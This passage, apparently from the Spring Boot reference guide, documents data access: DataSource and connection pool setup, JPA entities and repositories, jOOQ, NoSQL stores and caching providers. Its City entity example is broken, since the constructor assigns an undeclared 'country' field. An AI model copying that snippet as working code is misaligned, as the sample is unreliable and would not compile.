rules.\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete '`object relational mapping`'\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The '`How-to`' section includes a _<<howto.adoc#howto-database-initialization,\nsection on how to initialize a database>>_\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't need\nto provide any connection URLs, simply include a build dependency to the embedded database\nthat you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nTIP: If you're using H2 and, for whatever reason, you do configure its connection URL,\ncare should be taken to disable the database's automatic shutdown using\n`DB_CLOSE_ON_EXIT=FALSE`. This allows Spring Boot to control when the database is closed,\nthereby ensuring that it happens once access to the database is no longer needed.\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling `DataSource`.\nHere's the algorithm for choosing a specific implementation:\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If HikariCP is available we will use it.\n* If Commons DBCP is available we will use it, but we don't recommend it in production.\n* Lastly, if Commons DBCP2 is available we will use it.\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n'`starter POMs`' you will automatically get a dependency to `tomcat-jdbc`.\n\nNOTE: You can bypass that algorithm completely and specify the connection pool to use via\nthe `spring.datasource.type` property. Also, additional connection pools can always be\nconfigured manually. If you define your own `DataSource` bean, auto-configuration will\nnot occur.\n\nDataSource configuration is controlled by external configuration properties in\n`+spring.datasource.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options. Note also that you can configure any of the\n`DataSource` implementation specific properties via `+spring.datasource.*+`: refer to the\ndocumentation of the connection pool implementation you are using for more details.\n\nTIP: You often won't need to specify the `driver-class-name` since Spring boot can deduce\nit for most databases from the `url`.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n\n\n[[boot-features-connecting-to-a-jndi-datasource]]\n==== Connection to a JNDI DataSource\nIf you are deploying your Spring Boot application to an Application Server you might want\nto configure and manage your DataSource using your Application Servers built-in features\nand access it using JNDI.\n\nThe `spring.datasource.jndi-name` property can be used as an alternative to the\n`spring.datasource.url`, `spring.datasource.username` and `spring.datasource.password`\nproperties to access the `DataSource` from a specific JNDI location. For example, the\nfollowing section in `application.properties` shows how you can access a JBoss AS defined\n`DataSource`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.jndi-name=java:jboss\/datasources\/customers\n----\n\n\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and '`Spring Data`'\nThe Java Persistence API is a standard technology that allows you to '`map`' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/['`Accessing Data with JPA`'] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA '`Entity`' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead '`Entity Scanning`' is used. By default\nall packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration` or `@SpringBootApplication`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation. See\nthe _<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>_ how-to.\n\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities in a\ngiven state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces.\nIf you are using auto-configuration, repositories will be searched from the package\ncontaining your main configuration class (the one annotated with\n`@EnableAutoConfiguration` or `@SpringBootApplication`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default, JPA databases will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`+spring.jpa.*+` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `+spring.jpa.properties.*+` (the prefix is stripped before adding them\nto the entity manager). Example:\n\n[indent=0]\n----\n\tspring.jpa.properties.hibernate.globally_quoted_identifiers=true\n----\n\npasses `hibernate.globally_quoted_identifiers` to the Hibernate entity manager.\n\nBy default the DDL execution (or validation) is deferred until the `ApplicationContext`\nhas started. There is also a `spring.jpa.generate-ddl` flag, but it is not used if\nHibernate autoconfig is active because the `ddl-auto` settings are more fine-grained.\n\n\n\n[[boot-features-sql-h2-console]]\n=== Using H2's web console\nThe http:\/\/www.h2database.com[H2 database] provides a\nhttp:\/\/www.h2database.com\/html\/quickstart.html#h2_console[browser-based console] that\nSpring Boot can auto-configure for you. The console will be auto-configured when the\nfollowing conditions are met:\n\n* You are developing a web application\n* `com.h2database:h2` is on the classpath\n* You are using <<using-spring-boot.adoc#using-boot-devtools,Spring Boot's developer\n tools>>\n\nTIP: If you are not using Spring Boot's developer tools, but would still like to make use\nof H2's console, then you can do so by configuring the `spring.h2.console.enabled`\nproperty with a value of `true`. The H2 console is only intended for use during\ndevelopment so care should be taken to ensure that `spring.h2.console.enabled` is not set\nto `true` in production.\n\n\n\n[[boot-features-sql-h2-console-custom-path]]\n==== Changing the H2 console's path\nBy default the console will be available at `\/h2-console`. You can customize the console's\npath using the `spring.h2.console.path` property.\n\n\n\n[[boot-features-sql-h2-console-securing]]\n==== Securing the H2 console\nWhen Spring Security is on the classpath and basic auth is enabled, the H2 console will be\nautomatically secured using basic auth. The following properties can be used to customize\nthe security configuration:\n\n* `security.user.role`\n* `security.basic.authorize-mode`\n* `security.basic.enabled`\n\n\n\n[[boot-features-jooq]]\n== Using jOOQ\nJava Object Oriented Querying (http:\/\/www.jooq.org\/[jOOQ]) is a popular product from\nhttp:\/\/www.datageekery.com\/[Data Geekery] which generates Java code from your\ndatabase, and lets you build type safe SQL queries through its fluent API. Both the\ncommercial and open source editions can be used with Spring Boot.\n\n\n\n=== Code Generation\nIn oder to use jOOQ type-safe queries, you need to generate Java classes from your\ndatabase schema. You can follow the instructions in the\nhttp:\/\/www.jooq.org\/doc\/3.6\/manual-single-page\/#jooq-in-7-steps-step3[jOOQ user manual].\nIf you are using the `jooq-codegen-maven` plugin (and you also use the\n`spring-boot-starter-parent` \"`parent POM`\") you can safely omit the plugin's `<version>`\ntag. You can also use Spring Boot defined version variables (e.g. `h2.version`) to\ndeclare the plugin's database dependency. Here's an example:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.jooq<\/groupId>\n\t\t<artifactId>jooq-codegen-maven<\/artifactId>\n\t\t<executions>\n\t\t\t...\n\t\t<\/executions>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<groupId>com.h2database<\/groupId>\n\t\t\t\t<artifactId>h2<\/artifactId>\n\t\t\t\t<version>${h2.version}<\/version>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t\t<configuration>\n\t\t\t<jdbc>\n\t\t\t\t<driver>org.h2.Driver<\/driver>\n\t\t\t\t<url>jdbc:h2:~\/yourdatabase<\/url>\n\t\t\t<\/jdbc>\n\t\t\t<generator>\n\t\t\t\t...\n\t\t\t<\/generator>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\n\n\n=== Using DSLContext\nThe fluent API offered by jOOQ is initiated via the `org.jooq.DSLContext` interface.\nSpring Boot will auto-configure a `DSLContext` as a Spring Bean and connect it to your\napplication `DataSource`. To use the `DSLContext` you can just `@Autowire` it:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class JooqExample implements CommandLineRunner {\n\n\t\tprivate final DSLContext create;\n\n\t\t@Autowired\n\t\tpublic JooqExample(DSLContext dslContext) {\n\t\t\tthis.create = dslContext;\n\t\t}\n\n\t}\n----\n\nTIP: The jOOQ manual tends to use a variable named `create` to hold the `DSLContext`,\nwe've done the same for this example.\n\nYou can then use the `DSLContext` to construct your queries:\n\n[source,java,indent=0]\n----\n\tpublic List<GregorianCalendar> authorsBornAfter1980() {\n\t\treturn this.create.selectFrom(AUTHOR)\n\t\t\t.where(AUTHOR.DATE_OF_BIRTH.greaterThan(new GregorianCalendar(1980, 0, 1)))\n\t\t\t.fetch(AUTHOR.DATE_OF_BIRTH);\n\t}\n----\n\n\n\n=== Customizing jOOQ\nYou can customize the SQL dialect used by jOOQ by setting `spring.jooq.sql-dialect` in\nyour `application.properties`. For example, to specify Postgres you would add:\n\n[source,properties,indent=0]\n----\n\tspring.jooq.sql-dialect=Postgres\n----\n\nMore advanced customizations can be achieved by defining your own `@Bean` definitions\nwhich will be used when the jOOQ `Configuration` is created. You can define beans for\nthe following jOOQ Types:\n\n* `ConnectionProvider`\n* `TransactionProvider`\n* `RecordMapperProvider`\n* `RecordListenerProvider`\n* `ExecuteListenerProvider`\n* `VisitListenerProvider`\n\nYou can also create your own `org.jooq.Configuration` `@Bean` if you want to take\ncomplete control of the jOOQ configuration.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nCassandra; you can make use of the other projects, but you will need to configure them\nyourself. Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the\nhttps:\/\/github.com\/xetorthio\/jedis\/[Jedis] client library and abstractions on top of it\nprovided by https:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There\nis a `spring-boot-starter-redis` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate` the exclusion is based on the bean name\n'`redisTemplate`' not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the\n`spring-boot-starter-data-mongodb` '`Starter POM`'.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `org.springframework.data.mongodb.MongoDbFactory` to\naccess Mongo databases. By default the instance will attempt to connect to a MongoDB\nserver using the URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport org.springframework.data.mongodb.MongoDbFactory;\n\timport com.mongodb.DB;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoDbFactory mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoDbFactory mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t\tpublic void example() {\n\t\t\tDB db = mongo.getDb();\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nYou can set `spring.data.mongodb.uri` property to change the URL and configure\nadditional settings such as the _replica set_:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.uri=mongodb:\/\/user:secret@mongo1.example.com:12345,mongo2.example.com:23456\/test\n----\n\nAlternatively, as long as you're using Mongo 2.x, specify a `host`\/`port`. For example,\nyou might declare the following in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nNOTE: `spring.data.mongodb.host` and `spring.data.mongodb.port` are not supported if\nyou're using the Mongo 3.0 Java driver. In such cases, `spring.data.mongodb.uri` should be\nused to provide all of the configuration.\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nTIP: If you aren't using Spring Data Mongo you can inject `com.mongodb.Mongo` beans\ninstead of using `MongoDbFactory`.\n\nYou can also declare your own `MongoDbFactory` or `Mongo` bean if you want to take\ncomplete control of establishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a\n{spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`] class that is very\nsimilar in its design to Spring's `JdbcTemplate`. As with `JdbcTemplate` Spring Boot\nauto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that `City`\nis now a Mongo data class rather than a JPA `@Entity`, it will work in the same way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-mongo-embedded]]\n==== Embedded Mongo\nSpring Boot offers auto-configuration for\nhttps:\/\/github.com\/flapdoodle-oss\/de.flapdoodle.embed.mongo[Embedded Mongo]. To use\nit in your Spring Boot application add a dependency on\n`de.flapdoodle.embed:de.flapdoodle.embed.mongo`.\n\nThe port that Mongo will listen on can be configured using the `spring.data.mongodb.port`\nproperty. To use a randomly allocated free port use a value of zero. The `MongoClient`\ncreated by `MongoAutoConfiguration` will be automatically configured to use the randomly\nallocated port.\n\nIf you have SLF4J on the classpath, output produced by Mongo will be automatically routed\nto a logger named `org.springframework.boot.autoconfigure.mongo.embedded.EmbeddedMongo`.\n\nYou can declare your own `IMongodConfig` and `IRuntimeConfig` beans to take control of the\nMongo instance's configuration and logging routing.\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the\nhttp:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire] data management\nplatform. There is a `spring-boot-starter-data-gemfire` '`Starter POM`' for collecting the\ndependencies in a convenient way. There is currently no auto-configuration support for\nGemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation (`@EnableGemfireRepositories`)].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the Solr 4 client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\nTIP: Solr 5 is currently not supported and the auto-configuration will not be enabled by\na Solr 5 dependency.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nbean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elasticsearch] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nthe Elasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.cluster-nodes` to a comma-separated '`host:port`' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-cassandra]]\n=== Cassandra\nhttp:\/\/cassandra.apache.org\/[Cassandra] is an open source, distributed database management\nsystem designed to handle large amounts of data across many commodity servers. Spring Boot\noffers auto-configuration for Cassandra and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-cassandra[Spring Data Cassandra].\nThere is a `spring-boot-starter-data-cassandra` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-cassandra]]\n==== Connecting to Cassandra\nYou can inject an auto-configured `CassandraTemplate` or a Cassandra `Session`\ninstance as you would any other Spring Bean. The `spring.data.cassandra.*` properties\ncan be used to customize the connection. Generally you will to provide `keyspace-name`\nand `contact-points` properties:\n\n[source,properties,indent=0]\n----\n\tspring.data.cassandra.keyspace-name=mykeyspace\n\tspring.data.cassandra.contact-points=cassandrahost1,cassandrahost2\n----\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate CassandraTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(CassandraTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `CassandraTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-cassandra-repositories]]\n==== Spring Data Cassandra repositories\nSpring Data includes basic repository support for Cassandra. Currently this is more\nlimited than the JPA repositories discussed earlier, and will need to annotate finder\nmethods with `@Query`.\n\nTIP: For complete details of Spring Data Cassandra, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/cassandra\/docs\/[reference documentation].\n\n\n\n[[boot-features-caching]]\n== Caching\nThe Spring Framework provides support for transparently adding caching to an application.\nAt its core, the abstraction applies caching to methods, reducing thus the number of\nexecutions based on the information available in the cache. The caching logic is applied\ntransparently, without any interference to the invoker.\n\nNOTE: Check the {spring-reference}\/#cache[relevant section] of the Spring Framework\nreference for more details.\n\nIn a nutshell, adding caching to an operation of your service is as easy as adding the\nrelevant annotation to its method:\n\n[source,java,indent=0]\n----\n\timport javax.cache.annotation.CacheResult;\n\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MathService {\n\n\t\t@CacheResult\n\t\tpublic int computePiDecimal(int i) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nNOTE: You can either use the standard JSR-107 (JCache) annotations or Spring's own\ncaching annotations transparently. We strongly advise you however to not mix and match\nthem.\n\nTIP: It is also possible to {spring-reference}\/#cache-annotations-put[update] or\n{spring-reference}\/#cache-annotations-evict[evict] data from the cache transparently.\n\n\n\n=== Supported cache providers\nThe cache abstraction does not provide an actual store and relies on abstraction\nmaterialized by the `org.springframework.cache.Cache` and\n`org.springframework.cache.CacheManager` interfaces. Spring Boot auto-configures a\nsuitable `CacheManager` according to the implementation as long as the caching support is\nenabled via the `@EnableCaching` annotation.\n\nTIP: Use the `spring-boot-starter-cache` \"`Starter POM`\" to quickly add required caching\ndependencies. If you are adding dependencies manually you should note that certain\nimplementations are only provided by the `spring-context-support` jar.\n\nSpring Boot tries to detect the following providers (in this order):\n\n* <<boot-features-caching-provider-generic,Generic>>\n* <<boot-features-caching-provider-jcache,JCache (JSR-107)>>\n* <<boot-features-caching-provider-ehcache2,EhCache 2.x>>\n* <<boot-features-caching-provider-hazelcast,Hazelcast>>\n* <<boot-features-caching-provider-infinispan,Infinispan>>\n* <<boot-features-caching-provider-redis,Redis>>\n* <<boot-features-caching-provider-guava,Guava>>\n* <<boot-features-caching-provider-simple,Simple>>\n\nIt is also possible to _force_ the cache provider to use via the `spring.cache.type`\nproperty.\n\n\n\n[[boot-features-caching-provider-generic]]\n==== Generic\nGeneric caching is used if the context defines _at least_ one\n`org.springframework.cache.Cache` bean, a `CacheManager` wrapping them is configured.\n\n\n\n[[boot-features-caching-provider-jcache]]\n==== JCache\nJCache is bootstrapped via the presence of a `javax.cache.spi.CachingProvider` on the\nclasspath (i.e. a JSR-107 compliant caching library). It might happen than more that one\nprovider is present, in which case the provider must be explicitly specified. Even if the\nJSR-107 standard does not enforce a standardized way to define the location of the\nconfiguration file, Spring Boot does its best to accommodate with implementation details.\n\n[source,properties,indent=0]\n----\n # Only necessary if more than one provider is present\n\tspring.cache.jcache.provider=com.acme.MyCachingProvider\n\tspring.cache.jcache.config=classpath:acme.xml\n----\n\nNOTE: Since a cache library may offer both a native implementation and JSR-107 support\nSpring Boot will prefer the JSR-107 support so that the same features are available if\nyou switch to a different JSR-107 implementation.\n\nThere are several ways to customize the underlying `javax.cache.cacheManager`:\n\n* Caches can be created on startup via the `spring.cache.cache-names` property. If a custom\n`javax.cache.configuration.Configuration` bean is defined, it is used to customize them.\n* `org.springframework.boot.autoconfigure.cache.JCacheManagerCustomizer` beans are\ninvoked with the reference of the `CacheManager` for full customization.\n\nTIP: If a standard `javax.cache.CacheManager` bean is defined, it is wrapped\nautomatically in a `org.springframework.cache.CacheManager` implementation that the\nabstraction expects. No further customization is applied on 